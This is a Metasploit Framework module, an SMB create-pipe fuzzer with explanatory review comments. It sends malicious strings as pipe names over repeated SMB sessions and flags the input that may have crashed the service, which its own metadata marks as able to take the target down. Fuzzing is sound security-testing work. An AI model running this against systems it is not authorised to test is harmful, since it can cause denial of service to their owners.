GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'English'
# Auxiliary fuzzer that opens a fresh SMB session for every generated string
# and issues one create request for a pipe named after that string.
#
# The loop stops at the first iteration where the connection or login step
# fails. If an earlier iteration had succeeded, the previous input is reported
# as the one that may have taken the service down.
#
# NOTE(review): connect, smb_login, smb_create and disconnect are presumably
# supplied by the SMB client mixin, and fuzz_strings / @last_fuzzer_input by
# the Fuzzer mixin; neither definition is visible in this file.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Fuzzer

  # Registers the module metadata.
  #
  # 'Stability' lists CRASH_SERVICE_DOWN: the module itself declares that a
  # run can leave the target SMB service unavailable.
  #
  # @param info [Hash] metadata passed through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMB Create Pipe Request Fuzzer',
        'Description' => %q{
          This module sends a series of SMB create pipe
          requests using malicious strings.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Connects, logs in, then sends a single create request for "\<pkt>".
  #
  # @connected is cleared first and only set once both connect and smb_login
  # have returned, so the caller can tell a failure to reach the service
  # apart from an error raised by the create request itself.
  #
  # @param pkt [String] pipe name to request; a backslash is prepended
  # @param _opts [Object] accepted but never read
  # @return whatever smb_create returns
  def do_smb_create(pkt, _opts = {})
    @connected = false
    connect
    smb_login
    @connected = true

    pipe_name = '\\' + pkt
    smb_create(pipe_name)
  end

  # Drives the fuzzing loop: one connect / login / create / disconnect cycle
  # per string yielded by fuzz_strings, with a progress line every 100
  # iterations.
  #
  # Errors raised once the session is up are remembered but do not end the
  # run; only a failure before @connected is set does.
  def run
    prev_str = nil
    prev_input = nil
    failure = nil
    iteration = 0

    fuzz_strings do |str|
      iteration += 1

      print_status("Fuzzing with iteration #{iteration} using #{@last_fuzzer_input}") if (iteration % 100).zero?

      begin
        do_smb_create(str, 0.25)
      rescue ::Interrupt
        print_status("Exiting on interrupt: iteration #{iteration} using #{@last_fuzzer_input}")
        raise $ERROR_INFO
      rescue StandardError => e
        failure = e
      ensure
        # Tear the session down whether or not the request succeeded.
        disconnect
      end

      unless @connected
        # Connect or login did not complete. With a previous successful
        # iteration on record, that earlier input is the candidate for having
        # crashed the service; without one, the target was never reachable.
        # The string is printed hex-encoded.
        report =
          if prev_str
            "The service may have crashed: iteration:#{iteration - 1} method=#{prev_input} string=#{prev_str.unpack1('H*')} error=#{failure}"
          else
            "Could not connect to the service: #{failure}"
          end
        print_status(report)
        return
      end

      prev_str = str
      prev_input = @last_fuzzer_input
    end
  end
end